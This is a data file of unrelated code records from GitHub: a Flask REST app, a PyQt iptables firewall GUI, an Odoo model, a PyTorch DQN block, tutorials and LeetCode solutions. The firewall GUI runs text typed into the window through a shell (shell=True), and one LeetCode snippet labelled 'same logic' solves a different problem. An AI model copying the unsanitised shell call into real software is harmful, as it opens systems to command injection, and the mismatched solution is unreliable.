UserObj.get(args['user'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\tif args['data'] != '' and args['datatype'] != '':\n\t\t\t\t\tcontact = ContactObj(data=args['data'],user=user,datatype=args['datatype'])\n\t\t\t\treturn {'id': contact.id , 'user': user.name}, 201\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\n\napi.add_resource(Contact, '/contact', '/contact/')\napi.add_resource(User, '/user', '/user/')\napi.add_resource(Token, '/gettoken','/gettoken/')\n\n\ndef db_open(filename):\n create = False\n filename = os.path.abspath(filename)\n string_conn = 'sqlite:' + filename\n conn = sqlobject.connectionForURI(string_conn)\n sqlobject.sqlhub.processConnection = conn\n UserObj.createTable(ifNotExists=True)\n TokenObj.createTable(ifNotExists=True)\n ContactObj.createTable(ifNotExists=True)\n\n\n\ndef main():\n\tdb_open(\"myapp.db\")\n\tapp.run(debug=True, host='localhost', port=8080)\n\nif __name__ == '__main__':\n\tmain()\n\n\n","repo_name":"truravel88/REST-python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73631537012","text":"\"\"\"\n@ Author: 2054435 廖偲宇\n@ Date: 2023-04-29\n@ Version: 1.0\n@ Description: 编译器主程序(调用集成)\n\"\"\"\n\nfrom UI_Manager.ui_startup import *\nfrom UI_Manager.ui_main import *\n\n\ndef main():\n c_compiler = QtWidgets.QApplication(sys.argv) # 创建 QApplication 对象\n c_compiler.processEvents() # 处理未处理的事件并使应用程序保持响应,避免开屏影响其他\n\n open_splash = UI_Splash() # 创建 开屏画面 对象\n open_splash.effect()\n\n c_compiler_surface = QtWidgets.QMainWindow()\n ui = UI_Main()\n ui.__init_ui__(c_compiler_surface)\n c_compiler_surface.show()\n open_splash.finish(c_compiler_surface) # 调用 开屏画面 对象的 finish 方法,结束开屏效果\n sys.exit(c_compiler.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LiaoSiyuu/A-C-Like-Compiler","sub_path":"project_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10033060175","text":"# coding: utf-8\nimport subprocess\nimport os\nimport sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5 import uic\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import *\nimport socket\niptlist = [\"iptables\",\"-A\",\"INPUT\",\"-p\",\"프로토콜\",\"--dport\",\"포트번호\",\"-s\",\"소스\",\"-j\",\"ACCEPT\",\"서비스\",\"--icmp-type\",\"icmp종류\"]\n# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16\ntable = [iptlist[1],iptlist[11],iptlist[4],iptlist[6],iptlist[8],iptlist[10]]\n# 0 1 2 3 4 5\n\nglobal string, row, sume\nstring = \"\"\nrow = 0\nsume = [\"0\"]\ndef combine(index, value):\n iptlist[index] = value\n\ndef getsume():\n return int(sume[0])\n\ndef setsume(row):\n sume[0] = str(row)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, parent=None):\n QtWidgets.QDialog.__init__(self, parent)\n self.ui = uic.loadUi(\"test2.ui\", self)\n #파이선파일하고 ui 파일하고 직접 연결\n header = self.tableWidget.horizontalHeader()\n header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)\n self.accept.clicked.connect(self.accept_change)\n #이벤트(cliked) <= 이벤트 처리함수 연결\n self.fileopen.clicked.connect(self.fileopen_clicked)\n self.filesave.clicked.connect(self.filesave_clicked)\n self.bt_ctrule.clicked.connect(self.bt_ctrule_clicked)\n self.iptable_L.clicked.connect(self.iptable_L_clicked)\n self.iptable_F.clicked.connect(self.iptable_F_clicked)\n self.ruleaccept.clicked.connect(self.ruleaccept_clicked)\n self.tableclear.clicked.connect(self.tableclear_clicked)\n self.btflagcut.clicked.connect(self.btflagcut_clicked)\n self.btflagcutdel.clicked.connect(self.btflagcutdel_clicked)\n self.btpvipcut.clicked.connect(self.btpvipcut_clicked)\n self.btpvipcutdel.clicked.connect(self.btpvipcutdel_clicked)\n self.btallcut.clicked.connect(self.btallcut_clicked)\n self.btallcutdel.clicked.connect(self.btallcutdel_clicked)\n self.ui.show()\n self.Csource.activated[str].connect(self.changeSource)\n self.Ccmd.activated[str].connect(self.changeCmd)\n self.Cservice.activated[str].connect(self.changeService)\n self.Cdecision.activated[str].connect(self.changeDecision)\n self.Cicmptype.activated[str].connect(self.changeicmptype)\n\n\n\n def changeService(self, text):\n if text == \"사용자지정TCP규칙\":\n protocol = \"TCP\"\n port = \"\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"사용자지정UDP규칙\":\n protocol = \"UDP\"\n port = \"\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"사용자지정프로토콜\":\n protocol = \"\"\n port = \"0:65535\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"모든TCP\":\n protocol = \"TCP\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"모든UDP\":\n protocol = \"UDP\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"ICMP\":\n protocol = \"ICMP\"\n port = \"\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"모든ICMP-IPv6\":\n protocol = \"IPV6 ICMP\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"모든트래픽\":\n protocol = \"모두\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"SSH\":\n protocol = \"TCP\"\n port = \"22\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"SMTP\":\n protocol = \"TCP\"\n port = \"25\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"HTTP\":\n protocol = \"TCP\"\n port = \"80\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"POP3\":\n protocol = \"TCP\"\n port = \"110\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"IMAP\":\n protocol = \"TCP\"\n port = \"143\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"DNS(UDP)\":\n protocol = \"UDP\"\n port = \"53\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"DNS(TCP)\":\n protocol = \"TCP\"\n port = \"53\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"Telnet\":\n protocol = \"TCP\"\n port = \"23\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"TFTP\":\n protocol = \"TCP\"\n port = \"69\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4, protocol)\n combine(6, port)\n combine(11, text)\n if text == \"FTP\":\n protocol = \"TCP\"\n port = \"21\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"SNMP\":\n protocol = \"TCP\"\n port = \"161\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n\n\n def changeDecision(self, text):\n if text == \"허용\":\n decision = \"ACCEPT\"\n combine(10,decision)\n if text == \"거부\":\n decision = \"DROP\"\n combine(10,decision)\n\n def changeCmd(self, text):\n if text == \"추가\":\n cmd = \"-A\"\n combine(1,cmd)\n if text == \"삭제\":\n cmd = \"-D\"\n combine(1,cmd)\n\n def changeSource(self, text):\n source = \"\"\n if text == \"위치무관\":\n source = '0.0.0.0/0'\n self.Tsource.setText(source)\n combine(8, source)\n\n if text == \"내IP\":\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8',1))\n source = s.getsockname()[0]\n self.Tsource.setText(str(source))\n combine(8, source)\n\n if text == \"사용자지정\":\n self.Tsource.setText(\"\")\n combine(8, source)\n\n def changeicmptype(self, text):\n if text == \"echo-reply\":\n icmptype = text\n combine(13,text)\n elif text == \"destination-unreachable\":\n icmptype = text\n combine(13,text)\n elif text == \"redirect\":\n icmptype = text\n combine(13,text)\n elif text == \"echo-request\":\n icmptype = text\n combine(13,text)\n elif text == \"time-exceeded\":\n combine(13,text)\n icmptype = text\n print(icmptype)\n\n\n @pyqtSlot()\n def bt_ctrule_clicked(self):\n #iptables = [\"iptables\", \"명령어\", \"INPUT\", \"-p\", \"프로토콜\", \"--dport\", \"포트번호\", \"-s\", \"소스\", \"-j\", \"결정\"]\n iptlist[4] = self.Tprotocol.text()\n iptlist[6] = self.Tport.text()\n iptlist[8] = self.Tsource.text()\n\n table[0] = iptlist[1]\n table[1] = iptlist[11]\n table[2] = iptlist[4]\n table[3] = iptlist[6]\n table[4] = iptlist[8]\n table[5] = iptlist[10]\n\n\n if table[0] == \"-A\":\n table[0] = \"추가\"\n elif table[0] == \"-D\":\n table[0] = \"삭제\"\n\n if table[5] == \"ACCEPT\":\n table[5] = \"허용\"\n elif table[5] == \"DROP\":\n table[5] = \"차단\"\n\n if table[1] ==\"사용자지정TCP규칙\":\n table[1] = \"커스텀TCP\"\n elif table[1] == \"사용자지정UDP규칙\":\n table[1] = \"커스텀UDP\"\n\n if table[2] ==\"ICMP\":\n table[3] = iptlist[13]\n\n row = getsume()\n rowPosition = self.tableWidget.rowCount()\n self.tableWidget.insertRow(rowPosition)\n for i in range(6):\n item = QTableWidgetItem(table[i])\n # 테이블에 넣을 값 객체로 생성\n self.tableWidget.setItem(row,i,item)\n # 테이블에 아이템객체 삽입\n\n row = row +1\n setsume(row)\n\n\n\n temp = [\"iptables\", \"-A\", \"INPUT\", \"-P\", \"프로토콜\", \"--dport\", \"포트번호\", \"-s\", \"소스\", \"-j\", \"ACCEPT\"]\n # 0 1 2 3 4 5 6 7 8 9 10\n for i in range(11):\n temp[i] = iptlist[i]\n\n if temp[4] == \"ICMP\":\n temp[5] = \"--icmp-type\"\n temp[6] = iptlist[13]\n\n input = \" \".join(temp)\n\n text = self.consol.toPlainText() +'\\n'+ input\n self.consol.setPlainText(text)\n\n @pyqtSlot()\n def fileopen_clicked(self):\n fname = QFileDialog.getOpenFileName(self)\n load = 'iptables-restore < '+fname[0]\n result = subprocess.call(load, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n L = 'iptables -L --line-numbers'\n show = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n self.tbview.setPlainText(str(show))\n #fname[0] 파일 경로\n\n @pyqtSlot()\n def filesave_clicked(self):\n save = 'iptables-save > /home/leehoogy/iptables.rules'\n result = subprocess.call(save, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n QMessageBox.about(self,\"messege box\",\"save complite.\")\n\n @pyqtSlot()\n def iptable_L_clicked(self):\n L = 'iptables -L --line-numbers'\n result = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n self.tbview.setPlainText(str(result))\n\n @pyqtSlot()\n def iptable_F_clicked(self):\n F = 'iptables -F'\n result = subprocess.call(F, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n L = 'iptables -L --line-numbers'\n show = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n self.tbview.setPlainText(str(show))\n\n @pyqtSlot()\n def ruleaccept_clicked(self):\n text = self.consol.toPlainText()\n result = subprocess.call(text, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n L = 'iptables -L --line-numbers'\n show = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n self.tbview.setPlainText(str(show))\n\n @pyqtSlot()\n def tableclear_clicked(self):\n while (self.tableWidget.rowCount() > 0):\n {\n self.tableWidget.removeRow(0)\n }\n row = 0\n setsume(row)\n self.consol.setPlainText(\"\")\n\n @pyqtSlot()\n def accept_change(self):\n text = self.lineEdit.text()\n test = subprocess.check_output(text, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n self.tbview.setPlainText(str(test))\n\n @pyqtSlot()\n def btflagcut_clicked(self):\n flagcut = \"iptables -A INPUT -p TCP --tcp-flags ACK,FIN FIN -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL NONE -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL PSH,FIN -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL URG,PSH,FIN -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,PSH -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,RST -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,RST,PSH -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,ACK,RST -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN,RST,PSH -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags FIN,RST FIN,RST -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags SYN,FIN SYN,FIN -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ACK,PSH PSH -j DROP\\n\" \\\n \"iptables -A INPUT -p TCP --tcp-flags ACK,URG URG -j DROP\"\n print(flagcut)\n text = self.consol.toPlainText()\n text = text+\"\\n\"+flagcut\n self.consol.setPlainText(text)\n\n @pyqtSlot()\n def btflagcutdel_clicked(self):\n flagcutdel = \"iptables -D INPUT -p TCP --tcp-flags ACK,FIN FIN -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL NONE -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL PSH,FIN -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL URG,PSH,FIN -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,PSH -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,RST -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,RST,PSH -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,ACK,RST -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN,RST,PSH -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags FIN,RST FIN,RST -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags SYN,FIN SYN,FIN -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ACK,PSH PSH -j DROP\\n\" \\\n \"iptables -D INPUT -p TCP --tcp-flags ACK,URG URG -j DROP\"\n print(flagcutdel)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + flagcutdel\n self.consol.setPlainText(text)\n\n @pyqtSlot()\n def btpvipcut_clicked(self):\n pvipcut = \"iptables -A INPUT -i eth0 -s 10.0.0.0/8 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 172.16.0.0/12 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 192.168.0.0/16 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 224.0.0.0/4 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 240.0.0.0/5 -j DROP\"\n print(pvipcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + pvipcut\n self.consol.setPlainText(text)\n\n @pyqtSlot()\n def btpvipcutdel_clicked(self):\n pvipcut = \"iptables -D INPUT -i eth0 -s 10.0.0.0/8 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 172.16.0.0/12 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 192.168.0.0/16 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 224.0.0.0/4 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 240.0.0.0/5 -j DROP\"\n print(pvipcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + pvipcut\n self.consol.setPlainText(text)\n\n def btallcut_clicked(self):\n allcut = \"iptables -A INPUT -j DROP\"\n print(allcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + allcut\n self.consol.setPlainText(text)\n\n def btallcutdel_clicked(self):\n allcut = \"iptables -D INPUT -j DROP\"\n print(allcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + allcut\n self.consol.setPlainText(text)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n mainwindow = MainWindow()\n app.exec()","repo_name":"lugan1/network_programming","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":18055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22970655529","text":"from odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\nimport re, operator\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass TrackingCard(models.Model):\n _name = 'vnitpro.tracking.card'\n\n name = fields.Char('Name', compute='compute_name')\n delivery_plan_id = fields.Many2one('vnitpro.delivery.plan', 'Delivery Plan', required=True)\n contract_id = fields.Many2one('vnitpro.product.information', 'Contract',\n domain=\"[('delivery_plan_id','=',delivery_plan_id)]\", required=True)\n order_id = fields.Many2one('vnitpro.order', 'Order',\n domain=\"[('contract_id','=',contract_id),('status','=','draft')]\", required=True)\n customer_name = fields.Char('Customer Name', related='order_id.customer_name', readonly=True)\n product_group_id = fields.Many2one('vnitpro.product.group', 'Product', related='contract_id.product_group_id',\n readonly=True)\n delivery_formality_id = fields.Many2one('vnitpro.delivery.formality', 'Delivery Formality',\n related='contract_id.delivery_formality_id', readonly=True)\n weight_needed = fields.Float('Weight Needed', related='contract_id.weight', readonly=True)\n unit_id = fields.Many2one('vnitpro.unit', 'Unit', related='product_group_id.unit_id', readonly=True)\n expected_price = fields.Float('Expected Price', related='contract_id.expected_price', readonly=True)\n currency_id = fields.Many2one('vnitpro.currency', 'Currency', readonly=True)\n tracking_card_information_ids = fields.One2many('vnitpro.tracking.card.information', 'tracking_card_id',\n 'Tracking Card Information')\n total_weight_delivery = fields.Float('Total Weight Delivery', compute='compute_total', track_visibility='onchange')\n total_weight_left = fields.Float('Total Weight Left', compute='compute_total', track_visibility='onchange')\n total_cost = fields.Float('Total Cost', compute='compute_total', track_visibility='onchange')\n status = fields.Selection([('draft', 'Draft'),\n ('done', 'Done')], 'Status', default='draft', track_visibility='onchange')\n\n _sql_constraints = [('unique_contract', 'unique(contract_id)', 'The tracking card already exists!')]\n\n @api.multi\n def confirm_order(self):\n self.status = 'done'\n self.order_id.status = 'done'\n\n @api.multi\n def check_product(self):\n self.tracking_card_information_ids = False\n for record in self.order_id.order_detail_ids:\n self.currency_id = record.currency_id\n unit_price = record.unit_price\n break\n export_card_list = []\n weight_left = self.weight_needed\n inventory_export_cards = self.env['vnitpro.inventory.export.product.detail'].search(\n [('inventory_export_product_id.contract_id', '=', self.contract_id.id),\n ('product_group_id', '=', self.product_group_id.id),\n ('inventory_export_product_id.order_id', '=', self.order_id.id)])\n direct_export_cards = self.env['vnitpro.direct.import.product.detail'].search(\n [('direct_import_product_id.contract_id', '=', self.contract_id.id),\n ('product_group_id', '=', self.product_group_id.id),\n ('direct_import_product_id.order_id', '=', self.order_id.id)])\n for record in inventory_export_cards:\n export_card = {\n 'export_card_number': record.inventory_export_product_id.export_card_number,\n 'export_date': record.inventory_export_product_id.export_date,\n 'product_group_id': record.product_group_id,\n 'weight_delivery': record.present_quantity,\n 'currency_id': self.currency_id.id,\n 'cost': record.present_quantity * unit_price,\n }\n export_card_list.append(export_card)\n for record in direct_export_cards:\n export_card = {\n 'export_card_number': record.direct_import_product_id.export_card_number,\n 'export_date': record.direct_import_product_id.export_date,\n 'product_group_id': record.product_group_id,\n 'weight_delivery': record.present_quantity,\n 'currency_id': self.currency_id.id,\n 'cost': record.present_quantity * unit_price,\n }\n export_card_list.append(export_card)\n export_card_list.sort(key=operator.itemgetter('export_date'))\n for record in export_card_list:\n weight_left -= record['weight_delivery']\n record.update({'weight_left': weight_left})\n self.tracking_card_information_ids = export_card_list\n\n @api.one\n @api.depends('order_id')\n def compute_name(self):\n self.name = _('Tracking Card') + ' ' + self.order_id.code\n\n @api.multi\n @api.depends('tracking_card_information_ids')\n def compute_total(self):\n for record in self.tracking_card_information_ids:\n self.total_weight_delivery += record.weight_delivery\n self.total_weight_left = record.weight_left\n self.total_cost += record.cost\n\n\nclass TrackingCardInformation(models.Model):\n _name = 'vnitpro.tracking.card.information'\n\n tracking_card_id = fields.Many2one('vnitpro.tracking.card', 'Tracking Card', required=True, ondelete='cascade')\n\n export_card_number = fields.Char('Export Card Number', readonly=True)\n export_date = fields.Date('Export Date', readonly=True)\n product_group_id = fields.Many2one('vnitpro.product.group', 'Product', readonly=True)\n unit_id = fields.Many2one('vnitpro.unit', 'Unit', related='product_group_id.unit_id', readonly=True)\n weight_delivery = fields.Float('Weight Delivery', readonly=True)\n weight_left = fields.Float('Weight Left', readonly=True)\n cost = fields.Float('Cost', readonly=True)\n currency_id = fields.Many2one('vnitpro.currency', 'Currency', readonly=True)\n reversed = fields.Float('Reversed', compute='compute_reversed')\n\n @api.one\n def compute_reversed(self):\n import_quantity = export_quantity = 0\n import_inven_list = self.env['vnitpro.inventory.import.product.detail'].search(\n [('product_group_id', '=', self.product_group_id.id),\n ('inventory_import_product_id.import_date', '<=', self.export_date)])\n export_inven_list = self.env['vnitpro.inventory.export.product.detail'].search(\n [('product_group_id', '=', self.product_group_id.id),\n ('inventory_export_product_id.export_date', '<=', self.export_date)])\n for record in import_inven_list:\n import_quantity += record.quantity\n for record in export_inven_list:\n export_quantity += record.present_quantity\n self.reversed = import_quantity - export_quantity\n","repo_name":"tu2305/VNITPro_erp","sub_path":"vnitpro_consume/models/tracking_card.py","file_name":"tracking_card.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39662317952","text":"# Creating an empty set\nb = set()\nprint(type(b))\n\n#Adding values to an empty set\nb.add(4)\nb.add(5)\nb.add(5) # Adding a value repeatedly does not changes a set\n\nprint(b)\n\n#Lets observe weather we can add list in this set or not\n\nb.add([4,5,6])\n\nprint(b) \n#We will get unhashable type list which means we cannot add list in set(same for dicitionary)\n\n#but but but we can add tuple in this just use b.add((4,5,6))\n\n# b.remove(5) it will remove 5 from b\n# b.remove(15) it will show error as there is no '15'\n ","repo_name":"mehulbatra08/Python_Addy","sub_path":"class 5/06_set_methods.py","file_name":"06_set_methods.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41799055066","text":"from typing import Tuple\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass DQNImageBlock(nn.Module):\n def __init__(\n self,\n in_shape: Tuple[int, ...],\n filters: int = 32,\n activation=\"ReLU\",\n enable_time_distributed_layer: bool = False,\n ):\n super().__init__()\n self.enable_time_distributed_layer = enable_time_distributed_layer\n\n if isinstance(activation, str):\n activation = getattr(nn, activation)\n\n in_ch = in_shape[-3]\n\n # (batch, in_ch, 84, 84)\n # -> (batch, 32, 21, 21)\n # -> (batch, 64, 11, 11)\n # -> (batch, 64, 11, 11)\n self.image_layers = nn.ModuleList(\n [\n nn.Conv2d(\n in_ch,\n filters,\n kernel_size=8,\n stride=4,\n padding=3,\n padding_mode=\"replicate\",\n ),\n activation(inplace=True),\n nn.Conv2d(\n filters,\n filters * 2,\n kernel_size=4,\n stride=2,\n padding=2,\n padding_mode=\"replicate\",\n ),\n activation(inplace=True),\n nn.Conv2d(\n filters * 2,\n filters * 2,\n kernel_size=3,\n stride=1,\n padding=1,\n padding_mode=\"replicate\",\n ),\n activation(inplace=True),\n ]\n )\n\n # --- out shape\n x = np.ones((1,) + in_shape, dtype=np.float32)\n y = self.forward(torch.tensor(x))\n self.out_shape = y.shape[-3:]\n\n def forward(self, x):\n if self.enable_time_distributed_layer:\n # (batch, seq, c, h, w) -> (batch*seq, c, h, w)\n batch_size, seq, channels, height, width = x.size()\n x = x.view(batch_size * seq, channels, height, width)\n\n for layer in self.image_layers:\n x = layer(x)\n\n # (batch*seq, c, h, w) -> (batch, seq, c, h, w)\n _, channels, height, width = x.size()\n x = x.view(batch_size, seq, channels, height, width)\n\n else:\n for layer in self.image_layers:\n x = layer(x)\n\n return x\n\n\nif __name__ == \"__main__\":\n m = DQNImageBlock((96, 72, 3))\n print(m)\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/rl/models/dqn/torch_/dqn_image_block.py","file_name":"dqn_image_block.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"72862241014","text":"# You are given an m x n matrix of characters box representing a side-view of a box. Each cell of the box is one of the following:\n\n# A stone '#'\n# A stationary obstacle '*'\n# Empty '.'\n\n# The box is rotated 90 degrees clockwise, causing some of the stones to fall due to gravity. Each stone falls down until it lands on an obstacle, another stone, or the bottom of the box. Gravity does not affect the obstacles' positions, and the inertia from the box's rotation does not affect the stones' horizontal positions.\n\n# It is guaranteed that each stone in box rests on an obstacle, another stone, or the bottom of the box.\n\n# Return an n x m matrix representing the box after the rotation described above.\n\nclass Solution:\n def rotateTheBox(self, box: List[List[str]]) -> List[List[str]]:\n for row in box:\n for i in range(len(row)-1,-1,-1):\n if row[i] == '#':\n self.move(row,i)\n newBox = []\n for m in range(len(box[0])):\n level = []\n for n in range(len(box)-1,-1,-1):\n level.append(box[n][m])\n newBox.append(level)\n return newBox\n \n \n def move(self,row,idx):\n if idx < len(row) - 1:\n while idx < len(row) -1 and row[idx+1] == '.':\n row[idx] = '.'\n row[idx + 1] = '#'\n idx +=1 \n\n# Time complexity is O(MN^2 * M * N)\n\n# Space complexity is O(MN) if we consider the newBox grid\n\n# Same logic, more succint code\n\nclass Solution:\n def rangeSum(self, nums: List[int], n: int, left: int, right: int) -> int:\n sums = []\n for i in range(len(nums)):\n prefix = 0\n for j in range(i,len(nums)):\n prefix += nums[j]\n sums.append(prefix)\n sums.sort()\n return sum(sums[left-1:right])%(10**9+7)\n\n ","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/Array/rotatingTheBox.py","file_name":"rotatingTheBox.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13550797384","text":"\"\"\"Materials module.\n\nThis module defines the Material class and defines\nsome of the most common materials used in rotors.\n\"\"\"\nfrom collections.abc import Iterable\n\nimport numpy as np\n\nfrom ross.materials import Material\nfrom ross.stochastic.st_results_elements import plot_histogram\nfrom ross.units import check_units\n\n__all__ = [\"ST_Material\"]\n\n\nclass ST_Material:\n \"\"\"Create instance of Material with random parameters.\n\n Class used to create a material and define its properties.\n Density and at least 2 arguments from E, G_s and Poisson should be\n provided.\n\n If any material property is passed as iterable, the material becomes random.\n Inputing 1 or 2 arguments from E, G_s or Poisson as iterable will turn the\n third argument an iterable, but calculated based on the other two.\n\n For example:\n if E is iterable and G_s is float, then, Poisson is iterable and each\n term is calculated based on E values and G_s single value.\n\n You can run ross.Material.available_materials() to get a list of materials\n already provided.\n\n Parameters\n ----------\n name : str\n Material name.\n rho : float, list, pint.Quantity\n Density (kg/m**3).\n Input a list to make it random.\n E : float, list, pint.Quantity\n Young's modulus (N/m**2).\n Input a list to make it random.\n G_s : float, list\n Shear modulus (N/m**2).\n Input a list to make it random.\n Poisson : float, list\n Poisson ratio (dimensionless).\n Input a 